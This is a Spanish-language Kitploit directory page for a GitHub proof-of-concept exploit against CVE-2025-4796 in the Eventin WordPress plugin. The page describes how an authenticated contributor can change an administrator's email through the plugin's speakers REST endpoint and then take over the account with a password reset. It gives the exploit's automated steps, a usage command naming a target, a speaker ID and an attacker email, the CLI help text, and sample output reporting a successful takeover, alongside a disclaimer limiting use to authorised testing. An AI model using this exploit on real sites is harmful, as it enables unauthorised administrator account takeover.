Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - Autenticado (Colaborador+) Escalada de Privilegios mediante Cambio de Correo Electrónico del Usuario/Toma de Control de Cuenta | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-4796
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y Educación
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - Autenticado (Colaborador+) Escalada de Privilegios mediante Cambio de Correo Electrónico del Usuario/Toma de Control de Cuenta

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-4796

Eventin <= 4.0.34 - Escalada de privilegios autenticada (Contributor+) mediante cambio de correo electrónico del usuario / toma de control de la cuenta

🛡️ Eventin <= 4.0.34 - Escalada de privilegios autenticada (Contributor+) (CVE-2025-4796)

📌 Descripción general

Este repositorio documenta una vulnerabilidad de escalada de privilegios en el plugin Eventin de WordPress (<= 4.0.34) que permite a un usuario autenticado con capacidades de Contributor+ cambiar las direcciones de correo electrónico de usuarios arbitrarios a través de la API de actualización de ponentes del plugin. Al cambiar el correo electrónico de un administrador, un atacante puede provocar un restablecimiento de contraseña y tomar control de la cuenta.

  • Componente vulnerable: plugin Eventin de WordPress (Eventin\Speaker\Api\SpeakerController::update_item)

  • Versiones afectadas: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (Alta)

  • Instalaciones activas: 10,000+

⚠️ Detalles de la vulnerabilidad

Eventin no valida correctamente la identidad o los permisos de quien realiza la solicitud antes de actualizar los detalles del ponente/usuario (específicamente el correo electrónico). Un atacante autenticado como colaborador (o superior) puede cambiar la dirección de correo electrónico de otros usuarios, incluidos los administradores, mediante el endpoint REST del plugin:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

Una vez que el correo electrónico se cambia a una dirección controlada por el atacante, se puede utilizar el flujo estándar de restablecimiento de contraseña de WordPress para tomar el control de la cuenta.

🧰 Script (PoC)

Archivo: CVE-2025-4796.py

Este script automatiza los siguientes pasos:

  1. Inicia sesión en el sitio WordPress objetivo con las credenciales proporcionadas.
  2. Extrae el X-WP-Nonce requerido
  3. Envía una solicitud PUT a /wp-json/eventin/v2/speakers/<speaker_id> para actualizar el correo electrónico del ponente.
  4. Imprime y formatea la respuesta JSON y un mensaje de éxito profesional.

Requisitos:

  • Python 3.8+
  • requests

Instalación:

root@kitploit:~
pip install requests

🚀 Uso

Ejecute el script desde la línea de comandos:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

Mostrar ayuda del script:

root@kitploit:~
python CVE-2025-4796.py -h

📝 Opciones de CLI (ayuda)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ Ejemplo de salida exitosa

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ Divulgación responsable y descargo de responsabilidad

  • Este repositorio se proporciona con fines de investigación de seguridad, pruebas y defensa.
  • No utilice estas técnicas contra sistemas que no le pertenezcan o para los que no tenga autorización explícita para realizar pruebas.
  • La explotación no autorizada de vulnerabilidades es ilegal y poco ética.
  • Si es propietario de un sitio y cree que es vulnerable, actualice Eventin a la última versión o aplique los parches del proveedor de inmediato.
  • Utilice este código únicamente en entornos autorizados (laboratorio, pruebas de penetración aprobadas por el cliente o con permiso explícito).

🧾 Qué hace el script (resumen)

  • Valida las entradas (URL, correo electrónico) y normaliza el esquema de la URL.
  • Desactiva las advertencias SSL (opcional; se usa para admitir pruebas contra instancias de desarrollo con certificados autofirmados).
  • Inicia sesión con las credenciales de WordPress proporcionadas y valida el inicio de sesión mediante cookies.
  • Obtiene el X-WP-Nonce de la página de administración.
  • Envía una solicitud PUT autenticada para actualizar el correo electrónico del ponente.
  • Imprime la respuesta JSON formateada y un resumen final de éxito legible para humanos.

👤 Créditos

Por: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

Descargar herramienta